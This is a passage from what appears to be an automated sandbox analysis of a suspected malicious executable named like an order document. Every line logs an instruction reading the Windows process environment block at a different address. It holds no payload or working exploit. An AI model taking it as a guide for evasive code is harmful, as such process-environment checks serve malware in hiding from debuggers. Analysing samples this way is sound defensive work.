          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov eax, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov eax, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov ecx, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019999BF mov eax, dword ptr fs:[00000030h]17_2_019999BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F69A6 mov eax, dword ptr fs:[00000030h]17_2_019F69A6
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A61A0 mov eax, dword ptr fs:[00000030h]17_2_019A61A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A61A0 mov eax, dword ptr fs:[00000030h]17_2_019A61A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A041E8 mov eax, dword ptr fs:[00000030h]17_2_01A041E8
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197B1E1 mov eax, dword ptr fs:[00000030h]17_2_0197B1E1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197B1E1 mov eax, dword ptr fs:[00000030h]17_2_0197B1E1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197B1E1 mov eax, dword ptr fs:[00000030h]17_2_0197B1E1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979100 mov eax, dword ptr fs:[00000030h]17_2_01979100
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979100 mov eax, dword ptr fs:[00000030h]17_2_01979100
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979100 mov eax, dword ptr fs:[00000030h]17_2_01979100
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A513A mov eax, dword ptr fs:[00000030h]17_2_019A513A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A513A mov eax, dword ptr fs:[00000030h]17_2_019A513A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01994120 mov eax, dword ptr fs:[00000030h]17_2_01994120
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01994120 mov eax, dword ptr fs:[00000030h]17_2_01994120
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01994120 mov eax, dword ptr fs:[00000030h]17_2_01994120
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01994120 mov eax, dword ptr fs:[00000030h]17_2_01994120
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01994120 mov ecx, dword ptr fs:[00000030h]17_2_01994120
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199B944 mov eax, dword ptr fs:[00000030h]17_2_0199B944
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199B944 mov eax, dword ptr fs:[00000030h]17_2_0199B944
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197B171 mov eax, dword ptr fs:[00000030h]17_2_0197B171
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197B171 mov eax, dword ptr fs:[00000030h]17_2_0197B171
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197C962 mov eax, dword ptr fs:[00000030h]17_2_0197C962
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979080 mov eax, dword ptr fs:[00000030h]17_2_01979080
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F3884 mov eax, dword ptr fs:[00000030h]17_2_019F3884
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F3884 mov eax, dword ptr fs:[00000030h]17_2_019F3884
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AF0BF mov ecx, dword ptr fs:[00000030h]17_2_019AF0BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AF0BF mov eax, dword ptr fs:[00000030h]17_2_019AF0BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AF0BF mov eax, dword ptr fs:[00000030h]17_2_019AF0BF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B90AF mov eax, dword ptr fs:[00000030h]17_2_019B90AF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A0 mov eax, dword ptr fs:[00000030h]17_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A0 mov eax, dword ptr fs:[00000030h]17_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A0 mov eax, dword ptr fs:[00000030h]17_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A0 mov eax, dword ptr fs:[00000030h]17_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A0 mov eax, dword ptr fs:[00000030h]17_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A20A0 mov eax, dword ptr fs:[00000030h]17_2_019A20A0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0B8D0 mov eax, dword ptr fs:[00000030h]17_2_01A0B8D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0B8D0 mov ecx, dword ptr fs:[00000030h]17_2_01A0B8D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0B8D0 mov eax, dword ptr fs:[00000030h]17_2_01A0B8D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0B8D0 mov eax, dword ptr fs:[00000030h]17_2_01A0B8D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0B8D0 mov eax, dword ptr fs:[00000030h]17_2_01A0B8D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A0B8D0 mov eax, dword ptr fs:[00000030h]17_2_01A0B8D0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019740E1 mov eax, dword ptr fs:[00000030h]17_2_019740E1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019740E1 mov eax, dword ptr fs:[00000030h]17_2_019740E1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019740E1 mov eax, dword ptr fs:[00000030h]17_2_019740E1
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019758EC mov eax, dword ptr fs:[00000030h]17_2_019758EC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199B8E4 mov eax, dword ptr fs:[00000030h]17_2_0199B8E4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199B8E4 mov eax, dword ptr fs:[00000030h]17_2_0199B8E4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7016 mov eax, dword ptr fs:[00000030h]17_2_019F7016
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7016 mov eax, dword ptr fs:[00000030h]17_2_019F7016
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F7016 mov eax, dword ptr fs:[00000030h]17_2_019F7016
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A830 mov eax, dword ptr fs:[00000030h]17_2_0199A830
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A44015 mov eax, dword ptr fs:[00000030h]17_2_01A44015
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A44015 mov eax, dword ptr fs:[00000030h]17_2_01A44015
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198B02A mov eax, dword ptr fs:[00000030h]17_2_0198B02A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A002D mov eax, dword ptr fs:[00000030h]17_2_019A002D
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01990050 mov eax, dword ptr fs:[00000030h]17_2_01990050
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01990050 mov eax, dword ptr fs:[00000030h]17_2_01990050
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A32073 mov eax, dword ptr fs:[00000030h]17_2_01A32073
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A41074 mov eax, dword ptr fs:[00000030h]17_2_01A41074
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A45BA5 mov eax, dword ptr fs:[00000030h]17_2_01A45BA5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AB390 mov eax, dword ptr fs:[00000030h]17_2_019AB390
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2397 mov eax, dword ptr fs:[00000030h]17_2_019A2397
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01981B8F mov eax, dword ptr fs:[00000030h]17_2_01981B8F
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01981B8F mov eax, dword ptr fs:[00000030h]17_2_01981B8F
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2D380 mov ecx, dword ptr fs:[00000030h]17_2_01A2D380
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3138A mov eax, dword ptr fs:[00000030h]17_2_01A3138A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4BAD mov eax, dword ptr fs:[00000030h]17_2_019A4BAD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4BAD mov eax, dword ptr fs:[00000030h]17_2_019A4BAD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A4BAD mov eax, dword ptr fs:[00000030h]17_2_019A4BAD
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E3 mov ecx, dword ptr fs:[00000030h]17_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E3 mov ecx, dword ptr fs:[00000030h]17_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A223E3 mov eax, dword ptr fs:[00000030h]17_2_01A223E3
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F53CA mov eax, dword ptr fs:[00000030h]17_2_019F53CA
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019F53CA mov eax, dword ptr fs:[00000030h]17_2_019F53CA
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199DBE9 mov eax, dword ptr fs:[00000030h]17_2_0199DBE9
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A03E2 mov eax, dword ptr fs:[00000030h]17_2_019A03E2
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A309 mov eax, dword ptr fs:[00000030h]17_2_0199A309
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3131B mov eax, dword ptr fs:[00000030h]17_2_01A3131B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197F358 mov eax, dword ptr fs:[00000030h]17_2_0197F358
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197DB40 mov eax, dword ptr fs:[00000030h]17_2_0197DB40
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A3B7A mov eax, dword ptr fs:[00000030h]17_2_019A3B7A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A3B7A mov eax, dword ptr fs:[00000030h]17_2_019A3B7A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197DB60 mov ecx, dword ptr fs:[00000030h]17_2_0197DB60
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48B58 mov eax, dword ptr fs:[00000030h]17_2_01A48B58
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AD294 mov eax, dword ptr fs:[00000030h]17_2_019AD294
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AD294 mov eax, dword ptr fs:[00000030h]17_2_019AD294
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198AAB0 mov eax, dword ptr fs:[00000030h]17_2_0198AAB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0198AAB0 mov eax, dword ptr fs:[00000030h]17_2_0198AAB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AFAB0 mov eax, dword ptr fs:[00000030h]17_2_019AFAB0
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019752A5 mov eax, dword ptr fs:[00000030h]17_2_019752A5
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A34AEF mov eax, dword ptr fs:[00000030h]17_2_01A34AEF
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2ACB mov eax, dword ptr fs:[00000030h]17_2_019A2ACB
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2AE4 mov eax, dword ptr fs:[00000030h]17_2_019A2AE4
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197AA16 mov eax, dword ptr fs:[00000030h]17_2_0197AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0197AA16 mov eax, dword ptr fs:[00000030h]17_2_0197AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01993A1C mov eax, dword ptr fs:[00000030h]17_2_01993A1C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov eax, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov ecx, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov eax, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01975210 mov eax, dword ptr fs:[00000030h]17_2_01975210
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01988A0A mov eax, dword ptr fs:[00000030h]17_2_01988A0A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_0199A229 mov eax, dword ptr fs:[00000030h]17_2_0199A229
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3AA16 mov eax, dword ptr fs:[00000030h]17_2_01A3AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3AA16 mov eax, dword ptr fs:[00000030h]17_2_01A3AA16
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B4A2C mov eax, dword ptr fs:[00000030h]17_2_019B4A2C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B4A2C mov eax, dword ptr fs:[00000030h]17_2_019B4A2C
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2B260 mov eax, dword ptr fs:[00000030h]17_2_01A2B260
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A2B260 mov eax, dword ptr fs:[00000030h]17_2_01A2B260
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A48A62 mov eax, dword ptr fs:[00000030h]17_2_01A48A62
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01979240 mov eax, dword ptr fs:[00000030h]17_2_01979240
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019B927A mov eax, dword ptr fs:[00000030h]17_2_019B927A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A3EA55 mov eax, dword ptr fs:[00000030h]17_2_01A3EA55
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A04257 mov eax, dword ptr fs:[00000030h]17_2_01A04257
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AFD9B mov eax, dword ptr fs:[00000030h]17_2_019AFD9B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019AFD9B mov eax, dword ptr fs:[00000030h]17_2_019AFD9B
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A405AC mov eax, dword ptr fs:[00000030h]17_2_01A405AC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01A405AC mov eax, dword ptr fs:[00000030h]17_2_01A405AC
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_019A2581 mov eax, dword ptr fs:[00000030h]17_2_019A2581
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
          Source: C:\Users\user\Desktop\Order 275594 04-D4E5A.exeCode function: 17_2_01972D8A mov eax, dword ptr fs:[00000030h]17_2_01972D8A
